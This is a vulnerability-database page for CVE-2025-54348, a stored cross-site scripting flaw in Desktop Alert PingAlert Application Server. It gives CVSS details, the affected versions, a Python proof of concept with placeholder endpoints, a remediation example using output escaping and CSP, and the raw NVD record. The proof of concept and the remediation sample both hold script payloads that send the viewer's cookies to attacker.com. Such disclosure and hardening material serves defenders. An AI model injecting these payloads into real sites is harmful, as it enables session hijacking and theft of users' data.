Security Vulnerability Report
CVE-2025-54348 CVSS 6.5 MEDIUM

CVE-2025-54348

Published: 2025-11-14 18:15:49
Last Modified: 2025-11-20 14:54:54

Description

A Stored Cross-Site Scripting (XSS) vulnerability was found in the Application Server of Desktop Alert PingAlert versions 6.1.0.11 to 6.1.1.2 which allows an attacker to hijack a user's browser, capturing sensitive information.

Weakness: CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page), per the NVD record below. Read together with the CVSS vector, the attack needs an authenticated low-privilege account (PR:L) to store the payload and a victim who later views the stored alert (UI:R); because content stored by the server executes in the viewer's browser, the scope is Changed (S:C).

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:desktopalert:pingalert_application_server:*:*:*:*:*:*:*:* - VULNERABLE
Desktop Alert PingAlert 6.1.0.11
Desktop Alert PingAlert 6.1.0.12
Desktop Alert PingAlert 6.1.0.13
Desktop Alert PingAlert 6.1.1.0
Desktop Alert PingAlert 6.1.1.1
Desktop Alert PingAlert 6.1.1.2

Note: the NVD match criteria (see Raw JSON Data below) use versionStartIncluding 6.1.0.11 and versionEndExcluding 6.1.1.4, a slightly wider range than the builds enumerated above and in the CVE description. Treat any Application Server build from 6.1.0.11 up to but not including 6.1.1.4 as affected; NVD records 6.1.1.4 as the first unaffected build, which should be confirmed against the vendor advisory.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-54348 PoC - Stored XSS in Desktop Alert PingAlert
# Target: Desktop Alert PingAlert Application Server (v6.1.0.11 - v6.1.1.2)
#
# NOTE: the endpoint paths, JSON field names and credentials below are
# placeholders. Neither the CVE record nor the vendor advisory linked on
# this page documents the vulnerable request, so they must be replaced
# with the real values observed against an authorized test instance.

TARGET_URL = "http://target-server.com"  # Replace with actual target
LOGIN_URL = f"{TARGET_URL}/api/login"  # placeholder path
XSS_PAYLOAD_URL = f"{TARGET_URL}/api/pingalert/submit"  # placeholder path

# Payload that exfiltrates the viewer's cookies when the stored alert is
# rendered unescaped. It only reaches cookies without the HttpOnly flag,
# since document.cookie cannot read HttpOnly cookies.
XSS_PAYLOAD = "<script>fetch('https://attacker.com/log?c='+document.cookie)</script>"


def login():
    """Authenticate with a low-privilege account (PR:L in the CVSS vector)."""
    session = requests.Session()
    credentials = {"username": "attacker_user", "password": "password123"}
    response = session.post(LOGIN_URL, json=credentials, timeout=10)
    return session if response.status_code == 200 else None


def inject_xss(session):
    """Store the payload in an alert field that the server later renders."""
    payload = {
        "alert_name": "Critical System Alert",
        "alert_message": XSS_PAYLOAD,
        "priority": "high",
    }
    response = session.post(XSS_PAYLOAD_URL, json=payload, timeout=10)
    return response.status_code == 200


def main():
    print("[*] CVE-2025-54348 PoC - Desktop Alert PingAlert Stored XSS")
    session = login()
    if session is None:
        print("[-] Authentication failed")
        return
    print("[+] Authentication successful")
    if inject_xss(session):
        print("[+] XSS payload injected successfully")
        print("[*] Wait for a victim to open the alert page (UI:R)...")
    else:
        print("[-] Failed to inject payload")


if __name__ == "__main__":
    main()
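The fix for CWE-80 is to neutralize stored content at output time for the HTML context it lands in. The block below is an added illustration, not Desktop Alert's code: the real PingAlert rendering path is not disclosed on this page, so the Alert record (using the alert_name / alert_message / priority names from the PoC) and the two templates are assumptions. It pairs the unsafe concatenation that lets the PoC payload execute with an escaped version, adds an attribute-context payload that a filter which only strips script tags would miss, and lists the viewer-side headers (CSP, HttpOnly) that blunt cookie theft even if a sink is missed.

```python
import html
from dataclasses import dataclass

# Constructed sample payloads (assumptions for this example). The first is the
# payload shape used in the PoC above; the second breaks out of an attribute,
# which a filter that only removes <script> tags would not catch.
SCRIPT_PAYLOAD = "<script>fetch('https://attacker.com/log?c='+document.cookie)</script>"
ATTR_PAYLOAD = 'x" onmouseover="fetch(`https://attacker.com/log?c=`+document.cookie)'


@dataclass
class Alert:
    """Hypothetical stored alert record; field names follow the PoC, not the vendor."""
    name: str
    message: str
    priority: str


def render_alert_unsafe(alert: Alert) -> str:
    """Vulnerable pattern (CWE-80): attacker-controlled fields are concatenated
    into HTML unchanged, so whoever views the alert runs the stored script in
    the application's origin."""
    return (
        f'<div class="alert" data-priority="{alert.priority}">'
        f"<h2>{alert.name}</h2><p>{alert.message}</p></div>"
    )


def render_alert_safe(alert: Alert) -> str:
    """Hardened form: HTML-escape every untrusted value at the output sink.
    quote=True also converts ' and " so a value cannot close the
    data-priority attribute and start an event handler."""
    def esc(value: str) -> str:
        return html.escape(value, quote=True)

    return (
        f'<div class="alert" data-priority="{esc(alert.priority)}">'
        f"<h2>{esc(alert.name)}</h2><p>{esc(alert.message)}</p></div>"
    )


def viewer_hardening_headers() -> dict:
    """Defence in depth on the viewer side (generic mitigations, not the
    vendor's fix): a CSP that blocks inline script and cross-origin fetch(),
    and a session cookie that document.cookie cannot read."""
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; connect-src 'self'",
        "Set-Cookie": "session=<opaque>; Secure; HttpOnly; SameSite=Lax",
    }


if __name__ == "__main__":
    stored = Alert("Critical System Alert", SCRIPT_PAYLOAD, ATTR_PAYLOAD)
    print("unsafe:", render_alert_unsafe(stored))
    print("safe:  ", render_alert_safe(stored))
    for header, value in viewer_hardening_headers().items():
        print(f"{header}: {value}")
```

The escaped output still contains the literal words "script" and "onmouseover", which is the point: the fix is not to look for bad words in stored data but to make sure no stored byte can change the structure of the page it is printed into. Escaping has to match the sink, so a value written into a JavaScript string or a URL would need that context's encoder instead of html.escape.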

References

https://desktopalert.net (Product)
https://desktopalert.net/cve-2025-54348/ (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54348", "sourceIdentifier": "[email protected]", "published": "2025-11-14T18:15:49.063", "lastModified": "2025-11-20T14:54:53.907", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Stored Cross Site Scripting (XSS) vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 which allows an attacker to hijack user’s browser, capturing sensitive information."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:desktopalert:pingalert_application_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.0.11", "versionEndExcluding": "6.1.1.4", "matchCriteriaId": "3CE54623-DECB-4213-B299-40AAE561D3E2"}]}]}], "references": [{"url": "https://desktopalert.net", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://desktopalert.net/cve-2025-54348/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}